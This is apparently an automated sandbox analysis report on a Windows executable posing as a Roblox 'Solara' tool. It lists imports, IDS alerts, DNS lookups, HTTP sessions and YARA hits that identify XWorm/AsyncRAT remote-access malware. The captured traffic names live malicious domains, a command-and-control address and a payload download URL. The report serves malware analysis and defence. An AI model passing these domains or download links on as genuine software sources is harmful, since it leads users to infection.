RT_ICON | 0x47268 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.7278368794326241
RT_ICON | 0x476d0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | | | 0.6729508196721311
RT_ICON | 0x48058 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.6308630393996247
RT_ICON | 0x49100 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.566597510373444
RT_ICON | 0x4b6a8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | | | 0.5219059990552669
RT_ICON | 0x4f8d0 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736 | | | 0.5018022181146026
RT_ICON | 0x54d58 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | | | 0.46457851587134746
RT_ICON | 0x5e200 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.43163669703064
RT_ICON | 0x6ea28 | 0x119ea | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.0001385617292504
RT_GROUP_ICON | 0x80414 | 0x84 | data | | | 0.7272727272727273
RT_MANIFEST | 0x80498 | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
Imports

DLL | Import
USER32.dll | CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
KERNEL32.dll | GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Suricata IDS alerts

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T19:03:21.950129+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49707 | 104.21.93.27 | 443 | TCP
2024-12-20T19:05:22.723190+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.8 | 49838 | 147.185.221.18 | 35710 | TCP
                                                                                                                                                                                                    Dec 20, 2024 19:03:26.337488890 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.572078943 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.572182894 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.575414896 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.575426102 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.575853109 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.577126026 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:03:27.623323917 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.264781952 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.264889002 CET44349709104.20.22.46192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.265331984 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:03:28.266123056 CET49709443192.168.2.8104.20.22.46
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.051162004 CET4972335710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.170654058 CET3571049723147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.170839071 CET4972335710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.233340025 CET4972335710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:30.353702068 CET3571049723147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:32.982279062 CET8049706208.95.112.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:32.982343912 CET4970680192.168.2.8208.95.112.1
                                                                                                                                                                                                    Dec 20, 2024 19:04:35.493376017 CET3571049723147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:35.497354984 CET4972335710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.671601057 CET4972335710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.673588037 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.791157007 CET3571049723147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.793066978 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.793143988 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.816638947 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:39.937304020 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:04:50.968236923 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:04:51.087980986 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:00.343728065 CET4970680192.168.2.8208.95.112.1
                                                                                                                                                                                                    Dec 20, 2024 19:05:00.463217974 CET8049706208.95.112.1192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:02.097227097 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:02.217751980 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:13.238663912 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:13.358995914 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:17.037026882 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:17.037373066 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.107284069 CET4975235710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.109093904 CET4983835710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.226924896 CET3571049752147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.228636980 CET3571049838147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.228734016 CET4983835710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.264345884 CET4983835710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:18.384624004 CET3571049838147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:22.723190069 CET4983835710192.168.2.8147.185.221.18
                                                                                                                                                                                                    Dec 20, 2024 19:05:22.844368935 CET3571049838147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:23.549030066 CET3571049838147.185.221.18192.168.2.8
                                                                                                                                                                                                    Dec 20, 2024 19:05:23.549089909 CET4983835710192.168.2.8147.185.221.18
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 19:03:16.092793941 CET | 52817 | 53 | 192.168.2.8 | 1.1.1.1
Dec 20, 2024 19:03:16.230163097 CET | 53 | 52817 | 1.1.1.1 | 192.168.2.8
Dec 20, 2024 19:03:18.954171896 CET | 52367 | 53 | 192.168.2.8 | 1.1.1.1
Dec 20, 2024 19:03:19.092135906 CET | 53 | 52367 | 1.1.1.1 | 192.168.2.8
Dec 20, 2024 19:03:22.157427073 CET | 53101 | 53 | 192.168.2.8 | 1.1.1.1
Dec 20, 2024 19:03:22.295531034 CET | 53 | 53101 | 1.1.1.1 | 192.168.2.8
Dec 20, 2024 19:03:26.186937094 CET | 61305 | 53 | 192.168.2.8 | 1.1.1.1
Dec 20, 2024 19:03:26.335366964 CET | 53 | 61305 | 1.1.1.1 | 192.168.2.8
Dec 20, 2024 19:03:28.266953945 CET | 63745 | 53 | 192.168.2.8 | 1.1.1.1
Dec 20, 2024 19:03:28.405214071 CET | 53 | 63745 | 1.1.1.1 | 192.168.2.8
Dec 20, 2024 19:04:29.788145065 CET | 65364 | 53 | 192.168.2.8 | 1.1.1.1
Dec 20, 2024 19:04:30.047128916 CET | 53 | 65364 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 19:03:16.092793941 CET | 192.168.2.8 | 1.1.1.1 | 0x2091 | Standard query (0) | getsolara.dev | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:03:18.954171896 CET | 192.168.2.8 | 1.1.1.1 | 0xa3a9 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:03:22.157427073 CET | 192.168.2.8 | 1.1.1.1 | 0x87f5 | Standard query (0) | clientsettings.roblox.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:03:26.186937094 CET | 192.168.2.8 | 1.1.1.1 | 0xbb4c | Standard query (0) | www.nodejs.org | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:03:28.266953945 CET | 192.168.2.8 | 1.1.1.1 | 0x32cf | Standard query (0) | nodejs.org | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:04:29.788145065 CET | 192.168.2.8 | 1.1.1.1 | 0xa9e5 | Standard query (0) | hope-asia.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 19:03:16.230163097 CET | 1.1.1.1 | 192.168.2.8 | 0x2091 | No error (0) | getsolara.dev | - | 104.21.93.27 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:03:16.230163097 CET | 1.1.1.1 | 192.168.2.8 | 0x2091 | No error (0) | getsolara.dev | - | 172.67.203.125 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:03:19.092135906 CET | 1.1.1.1 | 192.168.2.8 | 0xa3a9 | No error (0) | ip-api.com | - | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:03:22.295531034 CET | 1.1.1.1 | 192.168.2.8 | 0x87f5 | No error (0) | clientsettings.roblox.com | titanium.roblox.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 19:03:22.295531034 CET | 1.1.1.1 | 192.168.2.8 | 0x87f5 | No error (0) | titanium.roblox.com | edge-term4.roblox.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 19:03:22.295531034 CET | 1.1.1.1 | 192.168.2.8 | 0x87f5 | No error (0) | edge-term4.roblox.com | edge-term4-fra2.roblox.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 19:03:22.295531034 CET | 1.1.1.1 | 192.168.2.8 | 0x87f5 | No error (0) | edge-term4-fra2.roblox.com | - | 128.116.123.3 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:03:26.335366964 CET | 1.1.1.1 | 192.168.2.8 | 0xbb4c | No error (0) | www.nodejs.org | - | 104.20.22.46 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:03:26.335366964 CET | 1.1.1.1 | 192.168.2.8 | 0xbb4c | No error (0) | www.nodejs.org | - | 104.20.23.46 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:03:28.405214071 CET | 1.1.1.1 | 192.168.2.8 | 0x32cf | No error (0) | nodejs.org | - | 104.20.22.46 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:03:28.405214071 CET | 1.1.1.1 | 192.168.2.8 | 0x32cf | No error (0) | nodejs.org | - | 104.20.23.46 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 19:04:30.047128916 CET | 1.1.1.1 | 192.168.2.8 | 0xa9e5 | No error (0) | hope-asia.gl.at.ply.gg | - | 147.185.221.18 | A (IP address) | IN (0x0001) | false
• getsolara.dev
• clientsettings.roblox.com
• www.nodejs.org
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 208.95.112.1 | 80 | 5560 | C:\Users\user\AppData\Local\Temp\msedge.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 19:03:19.219291925 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 20, 2024 19:03:20.315226078 CET | 175 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 18:03:19 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 104.21.93.27 | 443 | 6476 | C:\Users\user\AppData\Local\Temp\dddd.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 18:03:17 UTC | 81 | OUT | GET /asset/discord.json HTTP/1.1
Host: getsolara.dev
Connection: Keep-Alive
2024-12-20 18:03:18 UTC | 1044 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 18:03:17 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=0, must-revalidate
ETag: W/"7d966f73b6ce74a610dddaf0d0951ed8"
referrer-policy: strict-origin-when-cross-origin
x-content-type-options: nosniff
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdFcZxxzvmop8nol5fgp3uP7UqiHsdhZS6TAbZCFpKSff2vt%2F4W4oAJRlx1a16BLSarNyOSVsfFQ8HgVeB7fJ41ChvU213THPUT9w4KgeKHJYXZy4%2FUSgtkgCQz%2ByhYV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
                                                                                                                                                                                                    Strict-Transport-Security: max-age=0
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 8f518c5c58bd8c0c-EWR
                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1926&rtt_var=735&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2812&recv_bytes=695&delivery_rate=1474747&cwnd=206&unsent_bytes=0&cid=59bb1cc31079636b&ts=531&x=0"
                                                                                                                                                                                                    2024-12-20 18:03:18 UTC109INData Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
                                                                                                                                                                                                    Data Ascii: 67{ "args" : { "code" : "8PgspRYAQu" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
                                                                                                                                                                                                    2024-12-20 18:03:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49707 | 104.21.93.27 | 443 | 6476 | C:\Users\user\AppData\Local\Temp\dddd.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 18:03:21 UTC | 56 bytes | OUT
  GET /api/endpoint.json HTTP/1.1
  Host: getsolara.dev
2024-12-20 18:03:21 UTC | 1046 bytes | IN
  HTTP/1.1 200 OK
  Date: Fri, 20 Dec 2024 18:03:21 GMT
  Content-Type: application/json
  Transfer-Encoding: chunked
  Connection: close
  Access-Control-Allow-Origin: *
  Cache-Control: public, max-age=0, must-revalidate
  ETag: W/"75d0cd5c955470ce04c6372b65c32d37"
  referrer-policy: strict-origin-when-cross-origin
  x-content-type-options: nosniff
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k2ASba77%2F7NV11AQvHGkjzE8biSE4gKGm2vo7%2BDjr8yhzfEm92fFzoRGC%2F92%2B4kTiNXDzBr28BEnRslh2CJxY2nBUNVLhMjkT6xgVwGheD0iOOQpfHisNPqFaktHsEO6"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Vary: Accept-Encoding
  cf-cache-status: DYNAMIC
  Strict-Transport-Security: max-age=0
  Server: cloudflare
  CF-RAY: 8f518c74fc4b8cca-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1840&min_rtt=1839&rtt_var=692&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2813&recv_bytes=694&delivery_rate=1577525&cwnd=239&unsent_bytes=0&cid=2b7fff29c95e903c&ts=481&x=0"
2024-12-20 18:03:21 UTC | 323 bytes | IN
  Data Raw: 32 31 34 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 33 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 62 37 31 63 31 35 30 63 37 63 31 66 34 30 64 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 33 32 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 34 38 35 62 31 62 30 37 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73
  Data Ascii: 214{ "BootstrapperVersion": "1.23", "SupportedClient": "version-b71c150c7c1f40de", "SoftwareVersion": "3.132", "BootstrapperUrl": "https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
2024-12-20 18:03:21 UTC | 216 bytes | IN
  Data Raw: 2e 7a 69 70 22 2c 0a 20 20 20 20 22 56 65 72 73 69 6f 6e 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 65 74 74 69 6e 67 73 2e 72 6f 62 6c 6f 78 2e 63 6f 6d 2f 76 32 2f 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 2f 57 69 6e 64 6f 77 73 50 6c 61 79 65 72 2f 63 68 61 6e 6e 65 6c 2f 6c 69 76 65 22 2c 0a 20 20 20 20 22 43 6c 69 65 6e 74 48 61 73 68 22 3a 22 33 30 39 64 66 65 34 38 30 32 62 36 33 30 65 36 61 38 66 32 37 32 33 36 34 38 38 39 66 63 66 31 65 63 36 61 32 39 62 39 63 63 37 31 64 62 34 39 36 65 62 36 33 34 33 39 36 64 33 63 36 39 63 61 22 2c 0a 20 20 20 20 22 43 68 61 6e 67 65 6c 6f 67 22 3a 22 5b 2b 5d 22 0a 7d 0d 0a
  Data Ascii: .zip", "VersionUrl":"https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live", "ClientHash":"309dfe4802b630e6a8f272364889fcf1ec6a29b9cc71db496eb634396d3c69ca", "Changelog":"[+]"}
2024-12-20 18:03:21 UTC | 5 bytes | IN
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49708 | 128.116.123.34 | 443 | 6476 | C:\Users\user\AppData\Local\Temp\dddd.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 18:03:23 UTC | 119 bytes | OUT
  GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
  Host: clientsettings.roblox.com
  Connection: Keep-Alive
2024-12-20 18:03:24 UTC | 576 bytes | IN
  HTTP/1.1 200 OK
  content-length: 119
  content-type: application/json; charset=utf-8
  date: Fri, 20 Dec 2024 18:03:23 GMT
  server: Kestrel
  cache-control: no-cache
  strict-transport-security: max-age=3600
  x-frame-options: SAMEORIGIN
  roblox-machine-id: f63ffcfa-7b47-275e-eed1-ddb7c5532dc8
  x-roblox-region: us-central_rbx
  x-roblox-edge: fra2
  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
  connection: close
2024-12-20 18:03:24 UTC | 119 bytes | IN
  Data Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 35 34 2e 31 2e 36 35 34 30 34 37 37 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 62 37 31 63 31 35 30 63 37 63 31 66 34 30 64 65 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 31 2c 20 36 35 34 30 34 37 37 22 7d
  Data Ascii: {"version":"0.654.1.6540477","clientVersionUpload":"version-b71c150c7c1f40de","bootstrapperVersion":"1, 6, 1, 6540477"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49709 | 104.20.22.46 | 443 | 6476 | C:\Users\user\AppData\Local\Temp\dddd.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 18:03:27 UTC | 99 bytes | OUT
  GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
  Host: www.nodejs.org
  Connection: Keep-Alive
2024-12-20 18:03:28 UTC | 497 bytes | IN
  HTTP/1.1 307 Temporary Redirect
  Date: Fri, 20 Dec 2024 18:03:28 GMT
  Content-Type: text/plain
  Transfer-Encoding: chunked
  Connection: close
  Cache-Control: public, max-age=0, must-revalidate
  location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-vercel-id: iad1::t7h44-1734717808094-cd253c9d17c5
  CF-Cache-Status: DYNAMIC
  X-Content-Type-Options: nosniff
  Server: cloudflare
  CF-RAY: 8f518c9af890431a-EWR
2024-12-20 18:03:28 UTC | 20 bytes | IN
  Data Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
  Data Ascii: fRedirecting...
2024-12-20 18:03:28 UTC | 5 bytes | IN
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Target ID:0
Start time:13:03:12
Start date:20/12/2024
Path:C:\Users\user\Desktop\YgJ5inWPQO.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\YgJ5inWPQO.exe"
Imagebase:0x7ff7ff580000
File size:7'714'025 bytes
MD5 hash:ABBB4A5A77F9CF1530D24710A621026C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:2
Start time:13:03:13
Start date:20/12/2024
Path:C:\Users\user\Desktop\YgJ5inWPQO.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\YgJ5inWPQO.exe"
Imagebase:0x7ff7ff580000
File size:7'714'025 bytes
MD5 hash:ABBB4A5A77F9CF1530D24710A621026C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

Target ID: 3
